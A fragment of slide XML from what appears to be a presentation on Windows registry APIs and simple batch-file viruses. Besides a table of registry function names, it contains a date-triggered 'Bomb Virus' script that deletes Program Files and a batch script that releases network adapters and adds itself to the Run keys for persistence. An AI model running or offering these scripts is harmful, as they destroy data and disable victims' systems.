                  </a:txBody>
                  <a:tcPr marL="91440" marR="91440">
                    <a:lnL w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a2a9b1"/>
                      </a:solidFill>
                    </a:lnL>
                    <a:lnR w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a2a9b1"/>
                      </a:solidFill>
                    </a:lnR>
                    <a:lnT w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a2a9b1"/>
                      </a:solidFill>
                    </a:lnT>
                    <a:lnB w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a2a9b1"/>
                      </a:solidFill>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="f8f9fa"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr anchor="ctr">
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>RegEnumKeyEx</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91440" marR="91440">
                    <a:lnL w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a2a9b1"/>
                      </a:solidFill>
                    </a:lnL>
                    <a:lnR w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a2a9b1"/>
                      </a:solidFill>
                    </a:lnR>
                    <a:lnT w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a2a9b1"/>
                      </a:solidFill>
                    </a:lnT>
                    <a:lnB w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a2a9b1"/>
                      </a:solidFill>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="f8f9fa"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr anchor="ctr">
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>RegRestoreKey </a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91440" marR="91440">
                    <a:lnL w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a2a9b1"/>
                      </a:solidFill>
                    </a:lnL>
                    <a:lnR w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a2a9b1"/>
                      </a:solidFill>
                    </a:lnR>
                    <a:lnT w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a2a9b1"/>
                      </a:solidFill>
                    </a:lnT>
                    <a:lnB w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a2a9b1"/>
                      </a:solidFill>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="f8f9fa"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="603720">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr anchor="ctr">
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>RegEnumValue</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91440" marR="91440">
                    <a:lnL w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a2a9b1"/>
                      </a:solidFill>
                    </a:lnL>
                    <a:lnR w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a2a9b1"/>
                      </a:solidFill>
                    </a:lnR>
                    <a:lnT w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a2a9b1"/>
                      </a:solidFill>
                    </a:lnT>
                    <a:lnB w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a2a9b1"/>
                      </a:solidFill>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="f8f9fa"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr anchor="ctr">
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>RegSaveKey</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91440" marR="91440">
                    <a:lnL w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a2a9b1"/>
                      </a:solidFill>
                    </a:lnL>
                    <a:lnR w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a2a9b1"/>
                      </a:solidFill>
                    </a:lnR>
                    <a:lnT w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a2a9b1"/>
                      </a:solidFill>
                    </a:lnT>
                    <a:lnB w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a2a9b1"/>
                      </a:solidFill>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="f8f9fa"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr anchor="ctr">
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>RegFlushKey</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91440" marR="91440">
                    <a:lnL w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a2a9b1"/>
                      </a:solidFill>
                    </a:lnL>
                    <a:lnR w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a2a9b1"/>
                      </a:solidFill>
                    </a:lnR>
                    <a:lnT w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a2a9b1"/>
                      </a:solidFill>
                    </a:lnT>
                    <a:lnB w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a2a9b1"/>
                      </a:solidFill>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="f8f9fa"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr anchor="ctr">
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>RegSetKeySecurity </a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91440" marR="91440">
                    <a:lnL w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a2a9b1"/>
                      </a:solidFill>
                    </a:lnL>
                    <a:lnR w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a2a9b1"/>
                      </a:solidFill>
                    </a:lnR>
                    <a:lnT w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a2a9b1"/>
                      </a:solidFill>
                    </a:lnT>
                    <a:lnB w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a2a9b1"/>
                      </a:solidFill>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="f8f9fa"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="347760">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr anchor="ctr">
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>RegGetKeySecurity</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91440" marR="91440">
                    <a:lnL w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a2a9b1"/>
                      </a:solidFill>
                    </a:lnL>
                    <a:lnR w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a2a9b1"/>
                      </a:solidFill>
                    </a:lnR>
                    <a:lnT w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a2a9b1"/>
                      </a:solidFill>
                    </a:lnT>
                    <a:lnB w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a2a9b1"/>
                      </a:solidFill>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="f8f9fa"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr anchor="ctr">
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>RegSetValue</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91440" marR="91440">
                    <a:lnL w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a2a9b1"/>
                      </a:solidFill>
                    </a:lnL>
                    <a:lnR w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a2a9b1"/>
                      </a:solidFill>
                    </a:lnR>
                    <a:lnT w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a2a9b1"/>
                      </a:solidFill>
                    </a:lnT>
                    <a:lnB w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a2a9b1"/>
                      </a:solidFill>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="f8f9fa"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr anchor="ctr">
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>RegLoadKey</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91440" marR="91440">
                    <a:lnL w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a2a9b1"/>
                      </a:solidFill>
                    </a:lnL>
                    <a:lnR w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a2a9b1"/>
                      </a:solidFill>
                    </a:lnR>
                    <a:lnT w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a2a9b1"/>
                      </a:solidFill>
                    </a:lnT>
                    <a:lnB w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a2a9b1"/>
                      </a:solidFill>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="f8f9fa"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr anchor="ctr">
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>RegSetValueEx </a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91440" marR="91440">
                    <a:lnL w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a2a9b1"/>
                      </a:solidFill>
                    </a:lnL>
                    <a:lnR w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a2a9b1"/>
                      </a:solidFill>
                    </a:lnR>
                    <a:lnT w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a2a9b1"/>
                      </a:solidFill>
                    </a:lnT>
                    <a:lnB w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a2a9b1"/>
                      </a:solidFill>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="f8f9fa"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="603720">
                <a:tc>
                  <a:tcPr marL="91440" marR="91440">
                    <a:lnL w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a2a9b1"/>
                      </a:solidFill>
                    </a:lnL>
                    <a:lnR w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a2a9b1"/>
                      </a:solidFill>
                    </a:lnR>
                    <a:lnT w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a2a9b1"/>
                      </a:solidFill>
                    </a:lnT>
                    <a:lnB w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a2a9b1"/>
                      </a:solidFill>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="f8f9fa"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr anchor="ctr">
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>RegNotifyChangeKeyValue</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91440" marR="91440">
                    <a:lnL w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a2a9b1"/>
                      </a:solidFill>
                    </a:lnL>
                    <a:lnR w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a2a9b1"/>
                      </a:solidFill>
                    </a:lnR>
                    <a:lnT w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a2a9b1"/>
                      </a:solidFill>
                    </a:lnT>
                    <a:lnB w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a2a9b1"/>
                      </a:solidFill>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="f8f9fa"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr anchor="ctr">
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>RegUnLoadKey</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91440" marR="91440">
                    <a:lnL w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a2a9b1"/>
                      </a:solidFill>
                    </a:lnL>
                    <a:lnR w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a2a9b1"/>
                      </a:solidFill>
                    </a:lnR>
                    <a:lnT w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a2a9b1"/>
                      </a:solidFill>
                    </a:lnT>
                    <a:lnB w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a2a9b1"/>
                      </a:solidFill>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="f8f9fa"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:tcPr marL="91440" marR="91440">
                    <a:lnL w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a2a9b1"/>
                      </a:solidFill>
                    </a:lnL>
                    <a:lnT w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a2a9b1"/>
                      </a:solidFill>
                    </a:lnT>
                    <a:noFill/>
                  </a:tcPr>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>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ustomShape 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2809440"/>
            <a:ext cx="4381200" cy="1613880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ff7c80">
              <a:alpha val="50000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ff0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
              </a:rPr>
              <a:t>&gt;&gt; Bomb Virus</a:t>
            </a:r>
            <a:br/>
            <a:br/>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
              </a:rPr>
              <a:t>If %date% NEQ 2019/04/30 goto exit</a:t>
            </a:r>
            <a:br/>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
              </a:rPr>
              <a:t>del C:\Program Files\.... /y &gt;nul</a:t>
            </a:r>
            <a:br/>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
              </a:rPr>
              <a:t>:exit</a:t>
            </a:r>
            <a:br/>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
              </a:rPr>
              <a:t>exit</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1600" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="122" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9143640" cy="1124280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="fbd4b4"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="123" name="TextShape 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179640" y="1196640"/>
            <a:ext cx="8784720" cy="5112360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="124" name="CustomShape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12600" y="0"/>
            <a:ext cx="9109800" cy="2740680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="fde9d8"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ff0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>&gt;&gt;Disable Internet Permanently (bat file)</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GB" sz="1400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
              </a:rPr>
              <a:t>echo @echo off&gt;c:windowswimn32.bat</a:t>
            </a:r>
            <a:br/>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
              </a:rPr>
              <a:t>echo break off&gt;&gt;c:windowswimn32.bat</a:t>
            </a:r>
            <a:br/>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
              </a:rPr>
              <a:t>echo ipconfig/release_all&gt;&gt;c:windowswimn32.bat</a:t>
            </a:r>
            <a:br/>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
              </a:rPr>
              <a:t>echo end&gt;&gt;c:windowswimn32.bat</a:t>
            </a:r>
            <a:br/>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
              </a:rPr>
              <a:t>reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f</a:t>
            </a:r>
            <a:br/>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
              </a:rPr>
              <a:t>reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f</a:t>
            </a:r>
            <a:br/>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
              </a:rPr>
              <a:t>echo You Have Been HACKED!</a:t>
            </a:r>
            <a:br/>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
              </a:rPr>
              <a:t>PAUSE</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
